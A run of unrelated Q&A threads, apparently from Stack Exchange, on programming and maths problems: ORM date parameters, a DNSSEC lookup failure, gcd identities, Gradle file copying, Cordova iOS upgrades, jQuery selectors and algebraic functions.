SQL Query works fine in SSMS but not when executing from ORM, DateTime conversion error I have the following query in C# using the FluentData ORM. List<dynamic> results = Context().Sql(@"SELECT DISTINCT a.EnteredDate, bb.PK_EmployeeName, bb.EmployeeId, bb.EmployeeName, dd.PK_EquipmentName, dd.EquipmentId, dd.EquipmentName FROM dbo.PIT_Inspection a INNER JOIN dbo.PIT_EmployeeName bb ON a.FK_EmployeeName = bb.PK_EmployeeName INNER JOIN dbo.PIT_EquipmentName dd ON a.FK_EquipmentName = dd.PK_EquipmentName WHERE CAST(a.EnteredDate AS DATE) BETWEEN '@0' AND @1'", fromDate, toDate ).QueryMany<dynamic>(); The parameters fromDate and toDate are strings and come populated with the following: fromDate = "20150224" toDate = "20150227" The area that seems to give me problems is: WHERE CAST(a.EnteredDate AS DATE) BETWEEN '@0' AND '@1'", fromDate , toDate I'm receiving an error Conversion failed when converting date and/or time from character string In the above line, a.EnteredDate is of type DateTime. The query I'm executing runs fine if copied over to SQL Server Management Studio. I double checked that my parameter is indeed bringing in correct data, as a string. Any idea on what causes this error? Get rid of the '' around @0 and @1. The ORM will use a SqlParameter object to represent @0 and @1 and will automatically do that for you. That applies to all parameters like that, regardless of type. Secondly you have a typo in your query "'@0' AND @1'", you have a closing apostrophe after @1 but no opening apostrophe before @1. But you don't need the apostrophes at all. @Ryios Thank you, your first comment helped me fix the problem. Didn't know that it would automatically handle that for me. Note on your second comment - Look at my first code example, I do have an opening double quote. Either way, you should put this as an answer for me to accept. It may help others. 
My second comment was referring to this line BETWEEN '@0' AND @1' where the apostrophe (not double quote) is missing from the start of @1'. It's hard to see the apostrophes in my comment, they are crammed up next to the double quotes. Oh I see what you were referring to, it was correct in my code before I made the changes you recommended. I must've erased it by mistake when copying it over here. Most ORMs convert @ parameters into SqlParameter objects, which handle typing for you, so you don't need to enclose your query variables in apostrophes to denote a string. So change '@0' AND @1' to @0 AND @1 This likely applies to FluentData, and definitely applies to PetaPoco and Entity Framework.
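The same rule holds in any parameterized-query API, not just FluentData. As a minimal illustration, here is the principle with Python's built-in sqlite3 module (its placeholder is ? rather than @0; the table and values are made up for the demo):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE PIT_Inspection (EnteredDate TEXT)")
conn.execute("INSERT INTO PIT_Inspection VALUES ('20150225')")

# Placeholders are NOT wrapped in quotes: the driver binds them as typed
# parameters. Quoting a placeholder would compare against the literal
# placeholder string instead of the bound value.
rows = conn.execute(
    "SELECT EnteredDate FROM PIT_Inspection WHERE EnteredDate BETWEEN ? AND ?",
    ("20150224", "20150227"),
).fetchall()
print(rows)  # [('20150225',)]
```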
Delphi TExcelApplication and Windows Preview Pane I have a program that connects to an open Excel file via TExcelApplication and creates a worksheet. When I have the Windows preview pane activated, then I "previewed" my workbook, then I opened the workbook, and launched my app, the program returns the following error: 'Error OLE 800A03EC' In the Windows process list, I have 2 instances of Excel, one of which has as an argument: "Embedding" I think Delphi is trying to connect to the wrong instance. How do I connect to the right one? Here is the minimal code that reproduces the problem: procedure TForm1.Button1Click( Sender : TObject ); var Excel : TExcelApplication; begin try Excel := TExcelApplication.Create( Self ); Excel.ConnectKind := ckRunningInstance; Excel.Connect; Excel.Workbooks.Add( xlWBATWorksheet, 0 ); except on E : Exception do begin ShowMessage( E.Message ); end; end; end; end. Pictures to better understand what I'm talking about: Thank you in advance. Tristan What is xlWBATWorksheet? It's just an enum to create a worksheet: https://msdn.microsoft.com/fr-fr/library/microsoft.office.interop.excel.workbooks.add.aspx This code is fully functional without the Windows Preview Pane Oh apologies, I thought it was some variable or constant of your own. Seems the OLE error you are getting is similar to this post --> https://stackoverflow.com/questions/2355998/ole-800a03ec-error-when-using-texcelworkbook-saveas-method-in-delphi-7 We have the same error, but it's not the same problem: without the preview pane all is functional
DNS Issue - dig shows SERVFAIL / nslookup shows server can't find I have domain example.com, which is registered with a Czech domain provider and its nameservers are linked to AWS Route53. I am hosting it from my S3 bucket. This setup recently stopped working and I can't figure out what went wrong (no changes from my side). Why does the AWS nslookup work while the Google one does not? (see below) What is the issue with dig +trace @<IP_ADDRESS> example.com? (last command) AWS Route53 Settings Domain settings: whois example.com nsset: NS-PAVELSKRIPAL-CZ nserver: ns-1302.awsdns-34.org nserver: ns-1681.awsdns-18.co.uk nserver: ns-415.awsdns-51.com nserver: ns-551.awsdns-04.net registrar: REG-WEB4U created: 07.03.2018 23:06:05 changed: 09.03.2018 11:09:24 Nslookup succeeds (AWS) Query to the Route53 DNS server works (server name taken from AWS Route53): nslookup example.com ns-1302.awsdns-34.org. Server: ns-1302.awsdns-34.org. Address: <IP_ADDRESS>#53 Name: example.com Address: <IP_ADDRESS> Nslookup fails (Google) Query to Google DNS fails: nslookup example.com <IP_ADDRESS> Server: <IP_ADDRESS> Address: <IP_ADDRESS>#53 server can't find example.com: SERVFAIL Dig SERVFAIL Dig command displays SERVFAIL: dig example.com ; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> example.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 31793 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;example.com. IN A ;; Query time: 131 msec ;; SERVER: <IP_ADDRESS>#53(<IP_ADDRESS>) ;; WHEN: Thu Apr 23 11:32:02 CEST 2020 ;; MSG SIZE rcvd: 44 Dig +trace And I am not able to analyze this dig trace command. I cannot see where the issue is. dig +trace @<IP_ADDRESS> example.com ; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> +trace @<IP_ADDRESS> example.com ; (1 server found) ;; global options: +cmd . 85845 IN NS g.root-servers.net. . 85845 IN NS k.root-servers.net. . 
85845 IN NS h.root-servers.net. . 85845 IN NS c.root-servers.net. . 85845 IN NS d.root-servers.net. . 85845 IN NS l.root-servers.net. . 85845 IN NS m.root-servers.net. . 85845 IN NS i.root-servers.net. . 85845 IN NS f.root-servers.net. . 85845 IN NS j.root-servers.net. . 85845 IN NS a.root-servers.net. . 85845 IN NS b.root-servers.net. . 85845 IN NS e.root-servers.net. . 85845 IN RRSIG NS 8 0<PHONE_NUMBER>0505170000<PHONE_NUMBER>0000 48903 . p0dM/vuSKrWpnMwMMqOcqI5wGiSuwu7M0QdlhfHXSKwd7xfTWP2w/l+T 5mEVmC0bflkUqXvSO5As3KgHU6H/xCIA+CpHVCqG7PqSqVz0ZXpswWNs yDCaqSa0OvpQ8xdz56m30cGcEuOTBKcenHcgG5oEPWnK6BRTpNzpsIlm ItB/8lc2JPfEEfeJank0H3VHPlzxVY43wwO8Ypv172o/7Km+6jG0h0Hf fgnChk6+waNcNvf+AbGmn3lob/5BH03ehJ5HotEd7YRdeb4dEf4ow5sP uwpiblIifXk2CrOYAFuAiU+DjYjxFBCdvR+smx+hminsxjC6klf/F2SA aSiVDg== ;; Received 525 bytes from <IP_ADDRESS>#53(<IP_ADDRESS>) in 2 ms cz. 172800 IN NS b.ns.nic.cz. cz. 172800 IN NS c.ns.nic.cz. cz. 172800 IN NS d.ns.nic.cz. cz. 172800 IN NS a.ns.nic.cz. cz. 86400 IN DS 20237 13 2 CFF0F3ECDBC529C1F0031BA1840BFB835853B9209ED1E508FFF48451 D7B778E2 cz. 86400 IN RRSIG DS 8 1 86400<PHONE_NUMBER>0000<PHONE_NUMBER>0000 48903 . ki1m2J3TYtNnxpmbI6qBXhpyFztJMdPWLQkRL1ri9uUSXC2BAVpw8sh7 UlzEHQKjTwsVfLeK/lLAz+xEcSjQcxS3rcW+vzxVQpG/DMiQZuNmFk8Q bciGQrf2DUw4vzBdTLj/c0rv5RDCrF8nCqABIFw2qbITQJt7qVh3IICY 4IABAlzu5ftmk2Osyek63lldviBsfWcg9IwL3augsvbslToGzPL0h6fy 2iNiRAaH+aBQkxjI9+zhAGRwn+kAEH+MA2c8hlW88mKteOjk8DD1nxzi w164u/i5lfuVQWOoapJEEOaLtr4Jo4m5lq7OBHFWdYamAlYmX4p+0dwC OcZ6+A== ;; Received 626 bytes from <IP_ADDRESS>#53(a.root-servers.net) in 16 ms example.com. 3600 IN NS ns-415.awsdns-51.com. example.com. 3600 IN NS ns-551.awsdns-04.net. example.com. 3600 IN NS ns-1302.awsdns-34.org. example.com. 3600 IN NS ns-1681.awsdns-18.co.uk. example.com. 3600 IN DS 21649 5 2 F4CEAE3A81831B64E3D4E1162ACD5172F8C56443179677CDB455F742 F459A8D4 example.com. 3600 IN RRSIG DS 13 2 3600<PHONE_NUMBER>0508<PHONE_NUMBER>3531 44987 cz. 
ntrFNqObEZTSXaZvD3TVvR2GwCxJSiE+gQYBre+rXlCtibqIMAmOp6u8 oow3rQEFuUT+dXUjoHHYbZFaOTyYRQ== ;; Received 330 bytes from <IP_ADDRESS>#53(d.ns.nic.cz) in 1 ms example.com. 5 IN A <IP_ADDRESS> example.com. 172800 IN NS ns-1302.awsdns-34.org. example.com. 172800 IN NS ns-1681.awsdns-18.co.uk. example.com. 172800 IN NS ns-415.awsdns-51.com. example.com. 172800 IN NS ns-551.awsdns-04.net. ;; Received 200 bytes from <IP_ADDRESS>#53(ns-551.awsdns-04.net) in 22 ms You are not giving the real name, while the DNS is public, which makes troubleshooting more difficult. Try dnsviz.net/, it is a good tool for troubleshooting online. From your obfuscated traces you have DNSSEC; this is the most probable cause of failure. Easy to check with dig: add +cd, and if the SERVFAIL disappears, then with 99.99% probability the issue is a DNSSEC misconfiguration. dnsviz will shine here to show you the problem. But other than that the issue is kind of off topic here as it is not about running a website, the way you presented it. Also for problems like that your first stop should be the DNS provider. Did you ask it about the problems? I was giving the DNS name, but @john-conde edited it :-( The domain is pavelskripal.cz and it's still visible in the configuration image. I am pretty sure your "nsset" is conflicting with your "nserver" ones. You should decide once and for all who manages your nameservers. You seem to be trying to use 2 "providers" at the same time, which in most cases won't work. @amra I was wondering if you found what the issue was, as I am having the same problem. Thank you @MeV It was a problem with DNSSEC. It should be supported now: https://stackoverflow.com/questions/52873371/how-to-setup-dnssec-for-dns-records-on-aws There was no solution for that a year ago, so I just used the Cloudflare service. These tools helped: https://dnssec-analyzer.verisignlabs.com/ https://dnsviz.net
Which of the following statements are true for all such $a$ and $b$? Prove the statement or give a counterexample. For each of the following, decide whether or not the equality holds for all $a,b$. Prove each of the true statements and provide counterexamples for the false ones. $$\gcd(a+b,a-b)=\gcd(a,b)$$ $$\gcd(a+b,2a-b)=\gcd(a,b)$$ $$\gcd(a+b,2a+b)=\gcd(a,b)$$ $a$ and $b$ have to be positive integers, where $a>b$. I said the first statement is not true. Let $a=5$ and $b=3$. $a+b=8$, and $a-b=2$. Their gcd is $2$, but $5$ and $3$ are relatively prime, so their gcd is $1$, which contradicts the statement. Statement 2 is also false for $a=7$ and $b=2$: $\gcd(9,12)=3$ and $\gcd(7,2)=1$, and $3$ doesn't equal $1$. I said the third statement is true because if $a$ divides $b$, then $a+b$ and $2a+b$ both will sum to something that has the gcd. Is my reasoning flawed? Hint: Always a good idea to work some examples. I have, just I'm not sure if I am picking the right numbers. For example, picking numbers that divide each other instead of picking numbers that have the same gcd but don't divide each other. It's hard to believe you tried any numbers at all if you think the first claim is true. What are some of the numbers you tried? Oh, I see. It is a problem of picking the right numbers. So? Have you found a counterexample for the first one? Yes, editing right now. I have edited the question. Ok! So you have a valid counterexample for the first one. Good start. Now, you think the second one might be false...can you find a counterexample to that one? Hint: Really, try some more examples. Yes, 7 and 2 I believe. Good! Note: if you want to practice proofs, you might try to show that the first claim is "almost true". That is, $\gcd(a+b,a-b)$ is either $\gcd(a,b)$ or $2\times \gcd(a,b)$. A similar result holds for the second (though it isn't $2$ you sometimes must multiply by). For the third: your intuition is good for that one, but your argument is insufficient. 
Basically you are just saying "it's true because it is true" which is not good enough. You will need to try to write a proper proof. Well, $\gcd(a,b)$ must divide $a+b$ and $2a+b$ Yes, that is so (and that also holds for the other two supposed equalities). Let us continue this discussion in chat. Notes on a proof of the third one. It is clear that $\gcd(a,b)$ divides both $a+b,\,2a+b$. We need to argue that any common divisor of $a+b,\,2a+b$ divides both $a,b$. We will use the fact that if $d$ divides $m,n$ then $d$ divides $Am+Bn$ for all $A,B\in \mathbb Z$. So, suppose that $d$ divides both $a+b,\,2a+b$. Then: $d\,|\,a$ Proof: $d$ must divide $2a+b-(a+b)=a$ $d\,|\,b$ Proof: $d$ must divide $2(a+b)-(2a+b)=b$ and we are done.
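A quick numeric spot-check of the three claims and of the "almost true" refinement mentioned in the comments (a Python sketch, separate from the proof):

```python
from math import gcd

# Statement 1 fails: at a=5, b=3 we get gcd(8, 2) = 2 but gcd(5, 3) = 1.
assert gcd(5 + 3, 5 - 3) == 2 and gcd(5, 3) == 1

# Statement 2 fails: at a=7, b=2 we get gcd(9, 12) = 3 but gcd(7, 2) = 1.
assert gcd(7 + 2, 2 * 7 - 2) == 3 and gcd(7, 2) == 1

# Statement 3 holds on every pair with a > b >= 1 in this range.
assert all(gcd(a + b, 2 * a + b) == gcd(a, b)
           for a in range(2, 60) for b in range(1, a))

# The hinted refinement: gcd(a+b, a-b) is always gcd(a,b) or 2*gcd(a,b).
assert all(gcd(a + b, a - b) in (gcd(a, b), 2 * gcd(a, b))
           for a in range(2, 60) for b in range(1, a))
```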
How to change the color of only one table view cell's textLabel.text? In my UITableView I have 7 table view cells; I just want to change the text color of the 5th cell. Is it possible? I tried static cells but it won't work for me because I only want one cell's textLabel.textColor changed, not the other cells'. If you're using static cells you can set the color in storyboards directly Hey, I got the answer... I used the code below: if([cell.m_mainListLbl.text isEqualToString:@"Logout"]) { cell.m_mainListLbl.textColor=[UIColor redColor]; return cell; } If you have got the answer, why not post it as an answer? Use something like this: if(indexPath.row==4) { yourCell.textLabel.textColor=[UIColor redColor]; } else { yourCell.textLabel.textColor = [UIColor blackColor]; } Not the background color, I want to change the text color. Thanks for the help. I changed it. My answer is correct. Please accept my answer This will cause problems. You need to add else { yourCell.textLabel.textColor = [UIColor blackColor]; }. Without that, as you scroll your table view, other cells will appear with the red text. Also the 5th cell will have an indexPath.row of 4 ;) if([cell.m_mainListLbl.text isEqualToString:@"Logout"]) { cell.m_mainListLbl.textColor=[UIColor redColor]; return cell; } I used this code. It works for me. This will cause problems. You need to add else { cell.m_mainListLbl.textColor = [UIColor blackColor]; }. Without that, as you scroll your table view, other cells will appear with the red text.
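The "you need an else branch" comments are about cell reuse. Here is a toy Python model of the reuse pool (purely illustrative, no UIKit involved) showing how the red color "leaks" onto other rows when the reset branch is missing:

```python
class Cell:
    """Stand-in for a reusable table view cell."""
    def __init__(self):
        self.text_color = "black"

pool = [Cell(), Cell()]  # the table view recycles a small pool of cells

def cell_for_row(row, reset_color):
    cell = pool[row % len(pool)]  # a dequeued cell keeps whatever state it had
    if row == 4:
        cell.text_color = "red"
    elif reset_color:
        cell.text_color = "black"  # the else branch the comments insist on
    return cell

# Buggy version (no reset): row 4 paints a pooled cell red...
cell_for_row(4, reset_color=False)
# ...and row 6 reuses that same cell, so it shows up red too.
assert cell_for_row(6, reset_color=False).text_color == "red"

# Fixed version: the else branch restores the default color on reuse.
assert cell_for_row(6, reset_color=True).text_color == "black"
```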
Stop Gradle from modifying my image/file attribute info on copy I have an application that sorts images based on attribute data such as date last modified. In my unit test resources folder (test/resources) I have images that get copied to build/resources/test automatically when calling "gradle build". The problem is I need the files to have the same last modified date for testing. Is it possible to use Java's Files.copy in my build script to move the data and maintain its attributes? Or is there a way to tell Gradle to stop messing with my files? Gradle task: task copyImages(type :Copy){ from 'src/test/resources' into 'build/resources/test' } Update: My solution based on feedback was to use JavaExec. Gradle Build Script: apply plugin: 'java' repositories{ mavenCentral() } dependencies { testCompile group: 'junit', name: 'junit', version: '4.+' } task(moveImages, dependsOn: 'classes', type: JavaExec){ main = 'com.lifehug.support.TestSupport' classpath = sourceSets.test.runtimeClasspath args 'src/test/resources/navigator', 'build/resources/test/navigator' } defaultTasks 'moveImages' And then here is my Java file to move the images. Java File: public class TestSupport{ public static void main(String[] args) throws IOException { if( args.length < 2) return; final Path sourceDir = Paths.get(args[0]); final Path targetDir = Paths.get(args[1]); Files.walkFileTree(sourceDir, EnumSet.of(FileVisitOption.FOLLOW_LINKS), Integer.MAX_VALUE, new SimpleFileVisitor<Path>() { @Override public FileVisitResult preVisitDirectory(Path dir, BasicFileAttributes attrs) throws IOException { Path target = targetDir.resolve(sourceDir.relativize(dir)); Files.copy(dir, target, StandardCopyOption.COPY_ATTRIBUTES, StandardCopyOption.REPLACE_EXISTING); return FileVisitResult.CONTINUE; } @Override public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) throws IOException { Files.copy(file, targetDir.resolve(sourceDir.relativize(file)), StandardCopyOption.COPY_ATTRIBUTES, 
StandardCopyOption.REPLACE_EXISTING); return FileVisitResult.CONTINUE; } }); } } I suppose a workaround would be to use ant.copy(preservelastmodified: true, ...) -- but it would be nice to know how to do this with native Gradle. Looks like you're right. I'm going to try the Java route, but I agree this would work. Checking the Gradle Copy task documentation, I could not find a way to preserve the file timestamp. Doing some more research, apparently there's an open issue on that. As a workaround you can use alternative ways to copy, e.g. using ant.copy as @dnault suggested or just using Java code (see examples here for Java 6 and Java 7). Noob question I assume, but can I use Java code in my build.gradle script? Or do you mean create a Java program and have Gradle run it? Gradle is built over Groovy which is built over Java. In other words, you can use Java freely in your Gradle scripts.
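The underlying issue is not Gradle-specific: a plain byte-for-byte copy creates a new file with a fresh modification time, while an attribute-preserving copy carries the old one over. A small Python sketch of the distinction (shutil.copy2 plays the same role as Files.copy with COPY_ATTRIBUTES):

```python
import os
import shutil
import tempfile
import time

src_dir = tempfile.mkdtemp()
dst_dir = tempfile.mkdtemp()

src = os.path.join(src_dir, "test.png")
with open(src, "wb") as f:
    f.write(b"\x89PNG fake image data")

# Backdate the source file by one day, like a real test fixture.
day_ago = time.time() - 86400
os.utime(src, (day_ago, day_ago))

plain = os.path.join(dst_dir, "plain.png")
preserved = os.path.join(dst_dir, "preserved.png")

shutil.copyfile(src, plain)   # content only: mtime becomes "now"
shutil.copy2(src, preserved)  # content + metadata: mtime is preserved

assert os.path.getmtime(plain) - day_ago > 3600        # timestamp was lost
assert abs(os.path.getmtime(preserved) - day_ago) < 2  # timestamp survived
```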
Install specific version of Cordova CLI in Visual Studio 2017 I need to do some updates to a Cordova app created using Visual Studio 2017 Tools for Apache Cordova (TACO). The Cordova CLI version listed in the config.xml file is 6.3.1 and the cordova-ios platform version is 4.2.0 When I try to build the project (using a Mac with Xcode 8.3.3), I get this error Build failed with error Remotebuild requires your projects to use cordova-ios 4.3.0 or greater with XCode 8.3. Please update your cordova-ios version. I don't see any updates to TACO in VS2017 or instructions in the Microsoft documentation for Apache Cordova Tools. Ideally, I'd like to make the most minor version update possible to get my build working with Xcode 8.3.3. I know there is a Cordova version 7.0.1, but I don't want to make that upgrade just yet because I'm under the gun time-wise. Did you ever get a solution to this problem? I don't see any updates to TACO in VS2017 or instructions in the Microsoft documentation for Apache Cordova Tools. You can follow the steps below to use the latest cordova-ios: Open config.xml with the designer: Toolset -> check the Take latest patch (requires internet) checkbox on the cordova-ios row. Update: If you don't see the checkbox in the designer page, you need to change it in the xml. Find the following tag in config.xml: <engine name="ios" spec="4.2.0" /> and modify it to: <engine name="ios" spec="~4.2.0" /> Update2: If the version is still not updated to the latest, please try the below steps to fix the issue: Clear the cordova cache under: Tools->Options->Tools for Apache Cordova->Clear Cordova cache. Open a cmd prompt in your project folder; Type npm install -g cordova-ios to install cordova-ios globally (requires Node installed beforehand); Then cordova platform rm ios; Type cordova platform add ios; Run your project again I don't see this checkbox. I only see a dropdown for Toolset Name, with values for Cordova 6.3.1 or Global Cordova. 
cordova-ios is just static text with 4.2.0 Please try modifying the engine tag in config.xml as I mentioned in the update. Thanks for the help... But, I have checked the box to take the latest patch for cordova-ios (it actually changes the 4.2.0 to ~4.2.0)... Then I rebuild the solution and I STILL get the same error. Remote build error from the build server http://<IP_ADDRESS>:3000/cordova - Build failed with error Remotebuild requires your projects to use cordova-ios 4.3.0 or greater with XCode 8.3. Please update your cordova-ios version. This solution doesn't work as I get the same result as Paul. @ElvisXia-MSFT I've repaired my VS2017 instance and after following your instructions again (Update2) this issue is gone. But now I have a new one: Remote build error from the build server http://<IP_ADDRESS>:3000/cordova - Build failed with error cordovaProject.projectConfig.getFileResources is not a function. - Do you have any idea what it means? This is so frustrating, please help! For iOS, please install<EMAIL_ADDRESS>This is the only version I found working with Xcode 8.3.3 I had the same error, follow these steps: 1- If not installed yet, install Node 2- Install the latest version of Cordova or any other: npm install -g cordova 3- Install taco-cli: npm install -g taco-cli 4- Configure taco-cli: taco remote add ios (answer a few questions: Mac IP, port, etc.) 5- In your project root add or edit a file named "taco.json" containing: { "cordova-cli": "7.1.0" } Where 7.1.0 corresponds to your Cordova version (cordova --v) 6- Try to emulate on your Mac: taco emulate ios You may get an error about the platform. Ignore it 7- Close then open Visual Studio 8- In Visual Studio open the config.xml UI editor and change the toolset name to Global Cordova 9- Build using Visual Studio. If it doesn't work, please let me know I've literally followed your instructions and this is the result: https://i.sstatic.net/l4utc.jpg Do you really have a file taco.json as in step 5? 
Do you have an error at step 6? Yes I do. Even this user Reymonreyes85 wrote a comment reporting the same error I'm facing: https://learn.microsoft.com/en-us/visualstudio/cross-platform/tools-for-cordova/first-steps/installation I don't have the authority to add a comment to the answer above, so adding my updates here: If the version is still not updated to the latest, please try the below steps to fix the issue: First, modify your project config.xml file using an editor, rather than through the tools. Not sure why it was necessary, but this was the key difference from the above instructions. I also found that 4.3.1 was best. Remove any ~ characters before the version. Then: Clear the cordova cache under: Tools->Options->Tools for Apache Cordova->Clear Cordova cache. Open a cmd prompt in your project folder Type npm install -g cordova-ios to install cordova-ios globally (requires Node installed beforehand) Then cordova platform rm ios Type cordova platform add ios Run your project again If the cordova command in steps 4 and 5 doesn't work, add the cordova bin directory to your PATH. In my case C:\ProgramData\Microsoft\VisualStudio\MDA\ad0a0856\taco-toolset-6.3.1\node_modules\.bin\
How can I use pictures in my application? Angular CLI + webpack How can I use pictures in my application? How is this configured? angular-cli: 1.0.0-beta.16 (with webpack) I tried to put my images inside assets/images/test.png or assets/test.png but it does not work! And how can I reference my pictures from my HTML? angular-cli.json "apps": [ { "root": "src", "outDir": "dist", "assets": "assets", "index": "index.html", "main": "main.ts", "test": "test.ts", "tsconfig": "tsconfig.json", "prefix": "app", "mobile": false, "styles": [ "styles.css" ], ......other things.. Thanks. Do you get a 404? Please avoid "does not work" without providing an error log or anything else that can help identify the problem
Session-like storage option for a non-serializable object? Background (Skip this part if you want) Feel free to skip over this part if you choose, it's just some background for those who want to better understand the problem At the beginning of one action on my site, I kick off several asynchronous operations. The action returns before the operations are complete. This is what I want. However, the View that gets loaded by this action invokes several other actions in a different controller. Some of these actions rely on the results of the async calls from the first page, so I need to be able to wait on the async calls to finish from the other controller. I thought about just using Session to store the WaitHandles, but as WaitHandles aren't serializable, I obviously can't do that. Short version: I need to be able to store an async WaitHandle object somewhere from one controller, such that it can be reliably retrieved in a different controller. These WaitHandles also need to be user-specific, but I can handle that part. Just don't list an option that would make doing that impossible. And did you want that to scale to multiple servers? @HenkHolterman Well, yeah, but all the load balancing is taken care of at a higher level, so I would think I shouldn't have to worry about that Think again. Can you assure all related actions will run on the same server? @HenkHolterman Well, I don't know. I'd guess so, but I've never looked into the way we do load balancing around here as it isn't done by my team. I would guess the LB would be done per-session, but I don't know for sure. Also think about handling the resources. One aborted page and the server is left with a lot of dangling WaitHandles. @HenkHolterman Thought about it, but there's only 4 calls on the page, and only 1-2 that I need to actually implement this pattern on. On the "waiting" page, I had planned on checking for the existence and validity of the waithandle and then handling it accordingly. 
If it's null, or I catch an InvalidOperationException on deserializing, I'll get rid of it. Otherwise, use it @HenkHolterman can you think of a way to do this? Maybe a static object in my base controller or something? A static object would also be limited to one memory space. No solution there. I would try to restructure it to rely on the HTTP protocol only.
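The serialization wall here is not .NET-specific: synchronization primitives wrap OS-level handles that no serializer can meaningfully persist. Python's threading.Event hits the same wall with pickle, which makes a quick cross-language illustration of why an out-of-process session store can never hold a WaitHandle:

```python
import pickle
import threading

event = threading.Event()  # analogous to a WaitHandle: wraps a native lock

try:
    pickle.dumps(event)
    picklable = True
except TypeError:  # "cannot pickle '_thread.lock' object"
    picklable = False

assert not picklable
```

Only an in-memory, same-process store can hold such an object — which is exactly what makes the load-balancing concern in the comments real.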
jQuery selectors: is the order of selectors important? I have an HTML document which looks like this: <div id="panel_comments"> <table id="panel_comments_table"> <tr> <td style="width: 150px;">Monday: </td> <td><textarea id="panel_comments_monday" rows="4" cols="60" >Monday comment area</textarea></td> </tr> .. same with the other 6 weekdays </table> </div> Now, if I want to select all textareas I would do the following, which in natural language is: give me all elements which are textareas, with the following IDs: $("textarea [id^=panel_comments_]") but it gives me an empty result. Instead I have to rearrange the selectors like this, which in natural language is: give me all elements with the IDs, and which are textareas: $("[id^=panel_comments_] textarea") Why does the ordering of the selectors matter? Make sure you don't end up with multiple elements with the same ID The space is significant here, it is the descendant selector. Just omit it: textarea[id^=panel_comments_] The reason why [id^=panel_comments_] textarea seems to work is that it selects the div element with ID panel_comments and then finds all textareas that are descendants of it. So, this only works "by accident" since the div and the textarea have similar IDs. Had you given the div element a completely different ID, it would not have worked. CSS selectors work on hierarchical structures, like HTML, so it is only reasonable that the order of "sub-selectors" matters. Only if you don't want to express relations between elements does the order (almost) not matter: A simple selector is either a type selector or universal selector followed immediately by zero or more attribute selectors, ID selectors, or pseudo-classes, in any order. It was really an 'accident' that it worked the other way round. Thx, especially for the links. You want this, no extra space: $("textarea[id^=panel_comments_]") Using a space, as in: $("textarea [id^=panel_comments_]") means: select all elements with matching IDs inside a textarea. 
Using: $("[id^=panel_comments_] textarea") means: select all textareas inside elements with an ID starting with your selector string. Following BoltClock's comment, a type selector must come before any extra filter selector, which means: $("textarea[id^=panel_comments_]") is valid $("[id^=panel_comments_]textarea") is not valid Also, you can rearrange selectors in a chain in any order, except that a type selector like textarea must always come first. $("textarea[id^=panel_comments_]") remove that extra space
Why is the sum of two algebraic functions algebraic? Let $U\subset\mathbb{C}^n$ be a domain. A holomorphic function $f:U\to \mathbb{C}$ is called $\textbf{algebraic}$ if there exists a polynomial $p(x,y)$ in the variables of $U\times \mathbb{C}$ such that $p(x,f(x))=0$. A more geometric interpretation is that the graph $G_f$ of $f$ is an $\textbf{analytic component}$ of an algebraic set $X$. My question is: say $f,g$ are two algebraic functions, why is $f+g$ algebraic? It is unclear to me if the roots of $p$ define holomorphic functions, if they define them on all of $U$, etc. I also have a more general question. Say $f_1,f_2:\mathbb{C}\to \mathbb{C}$ and $g:\mathbb{C}^2\to\mathbb{C}$, all three algebraic. (Also I ask about the case where they are defined on some general domain, I just require them to be composable). Why is $g(f_1,f_2):\mathbb{C}\to\mathbb{C}$ algebraic? Here there is a real issue, that the Zariski closure of the graph of $G$ may be bad over some set (say it contains the entire fibre) and $(f_1,f_2)$ may hit this set. So that the graph of the composition is in general $\textbf{NOT}$ an analytic component of $\overline{G_g}\cap (f_1,f_2)(\mathbb{C})\times\mathbb{C}$. However it does seem that the composition is in general algebraic - why? Thank you very much! $a$ is algebraic over $k$ iff $k[a]$ is a finite dimensional $k$-vector space, in which case $k[a]=k(a)$ is a field. If $b$ is also algebraic then $k[a,b]$ is finite dimensional. $k[a+b]$ is a sub vector space so it must be finite dimensional. For the composition, with $f_1=f_1(z)$, use that if $g(x,y)$ is a root of $P(x,y,t)$ then $g(f_1,f_2)$ (if well-defined, i.e. if analytic somewhere) is a root of $P(f_1,f_2,t)$, thus algebraic over $\Bbb{C}(z,f_1,f_2)$. If $f_1,f_2$ are algebraic too then $\Bbb{C}(z,f_1,f_2,g(f_1,f_2))$ is a finite dimensional $\Bbb{C}(z)$ vector space. Your proof is problematic. 
The polynomial $P(f_1,f_2,t)$ may be just the zero polynomial, if by chance the coefficients of $t$ (which are polynomials in $f_1,f_2$) in it are polynomial relations for $f_1,f_2$. Note this issue doesn't happen with the sum, since $t-f_1-f_2=0$ can never be the zero polynomial - it is monic. No, because we take $P(x,y,t)\in \Bbb{C}(x,y)[t]_{monic}$. I should have said we need the coefficients of $P(f_1,f_2,t)$ to be analytic somewhere too (if $f_1=f_2$ and $P(x,y,0)=1/(x-y)$ then we'll have some trouble with $P(f_1,f_2,t)$) If you force $P$ to be monic in $t$ then nothing assures you that the coefficients of $P(f_1,f_2,t)$ are meromorphic functions, as you yourself write. In fact this issue corresponds exactly to the geometric issue that if $X=\overline{G}$ then $(f_1,f_2)$ may be contained in the set where $X$ contains the entire fibre (Zariski closure is meant). Can you explain why you may choose $P$ so this issue doesn't happen? Let $F=\Bbb C(x_1,\cdots,x_n)$ be the field of rational functions $U\to \Bbb C$. If $f$ is algebraic on $U$, the relation $p(x,f(x))$ implies that $f(x)$ is algebraic over $F$: we get that it satisfies a monic polynomial in $F[y]$ after dividing $p(x,y)$ by the leading coefficient of $y$. As both $f_1$ and $f_2$ are algebraic, this implies that $F(f_1(x),f_2(x))$ is a finite-dimensional vector space over $F$. As $F(f_1(x)+f_2(x))\subset F(f_1(x),f_2(x))$ is a subspace, it must also be finite dimensional, so $f_1+f_2$ is algebraic over $F$ with minimal polynomial $g(y)$, whose coefficients are rational functions on $U$. After clearing denominators, we recover a polynomial of the form $p'(x,f_1(x)+f_2(x))$, which demonstrates that $f_1+f_2$ is algebraic on $U$. Your second question has a typo: you want the target of $f_1,f_2$ to be $\Bbb C$, not $\Bbb C^2$. 
